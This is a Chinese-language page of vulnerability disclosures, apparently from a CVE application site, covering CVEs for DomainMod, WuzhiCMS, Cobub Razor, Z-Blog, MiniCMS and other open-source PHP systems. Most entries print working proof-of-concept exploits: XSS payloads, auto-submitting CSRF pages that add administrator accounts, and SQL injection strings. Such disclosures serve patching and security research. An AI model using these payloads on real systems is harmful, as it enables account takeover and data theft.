CVE中文申请站

CVE-2018-11558:DomainMod 4.10.0存在XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11558


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/36/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558
exploit-db:发布中

CVE-2018-11404:DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11404


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/15/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404
exploit-db:https://www.exploit-db.com/exploits/44783/

CVE-2018-11403:DomainMod v4.09.03的account-owner.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的account-owner.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11403


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/14/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403
exploit-db:https://www.exploit-db.com/exploits/44782/

CVE-2018-9927:五指CMS 4.1.0存在CSRF漏洞可增加用户账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加用户账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9927


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加普通用户账户。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />"; 
fields += "<input type='hidden' name='info[mobile]' value='' />"; 
fields += "<input type='hidden' name='modelids[]' value='10' />"; 
fields += "<input type='hidden' name='info[groupid]' value='3' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />"; 
fields += "<input type='hidden' name='info[truename]' value='' />"; 
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";

var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/7/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
exploit-db:https://www.exploit-db.com/exploits/44440/

CVE-2018-9926:五指CMS 4.1.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9926


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='form[role][]' value='1' />";
    fields += "<input type='hidden' name='form[username]' value='hack123' />"; 
    fields += "<input type='hidden' name='form[password]' value='' />"; 
    fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; 
    
    var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/6/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926
exploit-db:https://www.exploit-db.com/exploits/44439/

CVE-2018-8770:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8770


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。

三、利用代码

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/31/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8056:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8056


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/29/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8057:Cobub Razor 0.8.0存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在SQL注入漏洞
上报日期: 2018-04-16
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8057


二、漏洞概述

Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/30/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057
EXPLOIT-DB:https://www.exploit-db.com/exploits/44454/

CVE-2018-7745:Cobub Razor 0.7.2越权增加管理员账户

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2越权增加管理员账户
上报日期: 2018-04-09
漏洞发现者: ppb(ppb@5ecurity.cn)
产品首页: https://github.com/cobub/razor/
软件链接: https://github.com/cobub/razor/
版本: 0.72
CVE编号: CVE-2018-7745


二、漏洞概述

Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

利用代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http://127.0.0.1/" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12@qq.com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/24/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745
exploit-db:https://www.exploit-db.com/exploits/44419/

CVE-2018-7746:Cobub Razor 0.7.2存在跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2存在跨站请求伪造漏洞
上报日期: 2018-04-06
漏洞发现者: ppb(ppb@5ecurity.cn)
产品首页: https://github.com/cobub/razor/
软件链接: https://github.com/cobub/razor/
版本: 0.72
CVE编号: CVE-2018-7746


二、漏洞概述

Cobub Razor 0.7.2存在跨站请求伪造漏洞,在不登录的情况下发送特定数据包,可在频道管理页面增加频道项目。保存如下利用代码为html页面,打开页面将在/index.php?/manage/channel页面增加频道项目,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

利用代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel_id" value="979" />
      <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/26/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7746
exploit-db:https://www.exploit-db.com/exploits/44416/

CVE-2018-7653:YzmCMS 3.6存在XSS漏洞

一、漏洞摘要

漏洞名称: YzmCMS 3.6存在XSS漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: http://www.yzmcms.com/
软件链接: http://www.yzmcms.com/
版本: 3.6
CVE编号: CVE-2018-7653


二、漏洞概述

YzmCMS 3.6版本的 index.php页面a、c、m参数过滤不严格可导致跨站脚本漏洞。

三、利用代码

poc代码:
poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/26/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7653
exploit-db:https://www.exploit-db.com/exploits/44405/
MISC:https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html

CVE-2018-7737:Z-Blog 1.5.1.1740存在路径泄露漏洞

一、漏洞摘要

漏洞名称: Z-Blog 1.5.1.1740存在路径泄露漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://www.zblogcn.com/
软件链接: https://github.com/zblogcn/zblogphp
版本: 1.5.1.1740
CVE编号: CVE-2018-7737


二、漏洞概述

Z-BlogPHP 1.5.1.1740版本多个页面存在路径泄露漏洞。

三、利用代码

访问如下页面,报错信息中显示完整物理路径信息。

http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php

报错信息如下:

Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/24/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7737
exploit-db:https://www.exploit-db.com/exploits/44407/
MISC:https://packetstormsecurity.com/files/147063/Z-Blog-1.5.1.1740-Full-Path-Disclosure.html

CVE-2018-7736:Z-Blog 1.5.1.1740存在XSS漏洞

一、漏洞摘要

漏洞名称: Z-Blog 1.5.1.1740存在XSS漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://www.zblogcn.com/
软件链接: https://github.com/zblogcn/zblogphp
版本: 1.5.1.1740
CVE编号: CVE-2018-7736


二、漏洞概述

Z-BlogPHP 1.5.1.1740版本的cmd.php页面ZC_BLOG_SUBNAME及ZC_UPLOAD_FILETYPE参数过滤不严格可导致跨站脚本漏洞。

三、利用代码

ZC_BLOG_SUBNAME参数poc代码:

post_url:http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f
 
post_data:
 
ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
 

ZC_UPLOAD_FILETYPE参数poc代码:

post_data:
 
ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek"><script>alert(1)</script>ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/23/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7736
exploit-db:https://www.exploit-db.com/exploits/44406/
MISC:https://packetstormsecurity.com/files/147066/Z-Blog-1.5.1.1740-Cross-Site-Scripting.html

CVE-2018-9092:MiniCMS 1.10存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: MiniCMS 1.10存在CSRF漏洞可增加管理员账户
上报日期: 2018-03-30
漏洞发现者: zixian(me@zixian.org、zixian@5ecurity.cn)
产品首页: https://github.com/bg5sbk/MiniCMS
软件链接: https://github.com/bg5sbk/MiniCMS
版本: 1.10
CVE编号: CVE-2018-9092


二、漏洞概述

MiniCMS 1.10存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加管理员账户。MiniCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

 <html>
 <head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
 <title>test</title>
 <body>
 <form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
 <input type="hidden" name="site_name" value="hack123" />  
 <input type="hidden" name="site_desc" value="hacktest" />  
 <input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
 <input type="hidden" name="user_nick" value="hack" />  
 <input type="hidden" name="user_name" value="admin" />  
 <input type="hidden" name="user_pass" value="hackpass" />  
 <input type="hidden" name="comment_code" value="" />  
 <input type="hidden" name="save" value=" " /> 
 </form>
 <script>
  document.forms[0].submit();
 </script>
 </body>
 </head>
 </html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/27/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9092
exploit-db:https://www.exploit-db.com/exploits/44362/

CVE-2018-8717:joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-03-14
漏洞发现者: yx(yx@5ecurity.cn)
产品首页: https://github.com/joyplus/joyplus-cms/
软件链接: https://github.com/joyplus/joyplus-cms/
版本: 1.6.0
CVE编号: CVE-2018-8717


二、漏洞概述

joyplus-cms 1.6.0存在CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。joyplus-cms是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.126.129/joyplus-cms-master/joyplus-cms/manager/admin_ajax.php?action=save&tab={pre}manager" method="POST">
      <input type="hidden" name="m&#95;id" value="" />
      <input type="hidden" name="flag" value="add" />
      <input type="hidden" name="m&#95;name" value="admin1" />
      <input type="hidden" name="m&#95;password" value="admin1" />
      <input type="hidden" name="m&#95;status" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/32/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8717

CVE-2018-7720:Cobub Razor 0.7.2存在跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2存在跨站请求伪造漏洞
上报日期: 2018-03-06
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.7.2
CVE编号: CVE-2018-7720


二、漏洞概述

Cobub Razor 0.7.2存在跨站请求伪造漏洞,管理员登陆后访问特定页面可增加管理员账号。保存如下利用代码为html页面,打开页面将增加test123/test的管理员账号。

三、利用代码

利用代码如下:

  <body>
  <script>alert(document.cookie)</script>
    <form action="http://localhost/index.php?/user/createNewUser/" method="POST">
      <input type="hidden" name="username" value="test123" />
      <input type="hidden" name="email" value="test&#64;test123&#46;test" />
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm&#95;password" value="test" />
      <input type="hidden" name="userrole" value="3" />
      <input type="hidden" name="user&#47;ccreateNewUser" value="�&#136;&#155;�&#187;�" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/28/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7720

CVE-2018-7662:Couch through 2.0存在路径泄露漏洞

一、漏洞摘要

漏洞名称: Couch through 2.0存在路径泄露漏洞
上报日期: 2018-03-04
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://github.com/CouchCMS/CouchCMS/
软件链接: https://github.com/CouchCMS/CouchCMS/
版本: 2.0
CVE编号: CVE-2018-7662


二、漏洞概述

Couch through 2.0存在路径泄露漏洞,当访问特定url时系统返回的报错信息中暴露物理路径信息。Couch through是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。
111.png
222.png

三、利用代码

访问如下页面,报错信息中显示完整物理路径信息。

Location:
includes/mysql2i/mysql2i.func.php
addons/phpmailer/phpmailer.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/35/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7662

CVE-2016-6159:华为WS331a产品管理页面存在凭证管理漏洞

一、漏洞摘要

漏洞名称: 华为WS331a产品管理页面存在凭证管理漏洞
上报日期: 2016-09-07
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.huawei.com/
软件链接: http://www.huawei.com/
版本: WS331a-10 V100R001C02B017SP01及之前版本
CVE编号: CVE-2016-6159


二、漏洞概述

WS331a产品的管理页面中存在一个凭证管理漏洞,由于在密码校验时处理不当,未经认证的攻击者可以向受影响产品LAN口发送特定报文利用此漏洞。成功利用此漏洞,攻击者可以以管理员权限登录设备。(漏洞编号:HWPSIRT-2016-07079)
此漏洞的CVE编号为:CVE-2016-6159。


三、利用代码

漏洞发现者未公开利用代码。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/21/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6159
